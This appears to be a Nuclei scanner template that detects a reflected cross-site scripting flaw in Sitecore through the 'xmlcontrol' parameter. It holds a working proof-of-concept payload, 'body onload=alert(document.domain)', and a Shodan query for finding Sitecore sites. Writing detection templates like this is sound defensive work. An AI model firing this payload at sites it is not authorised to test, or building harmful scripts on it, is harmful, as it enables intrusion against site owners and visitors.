id: sitecore-xml-xss info: name: SiteCore XML Control Script Insertion author: DhiyaneshDK severity: medium description: | Sitecores “special way” of displaying XML Controls directly allows for a Cross Site Scripting Attack – more can be achieved with these XML Controls reference: | - https://vulners.com/securityvulns/SECURITYVULNS:DOC:30273 - https://web.archive.org/web/20151016072340/http://www.securityfocus.com/archive/1/530901/100/0/threaded metadata: verified: "true" max-request: 1 shodan-query: html:"Sitecore" tags: xss,sitecore,cms http: - method: GET path: - "{{BaseURL}}/?xmlcontrol=body%20onload=alert(document.domain)" matchers-condition: and matchers: - type: word part: body words: - "" - type: word part: header words: - text/html - type: status status: - 200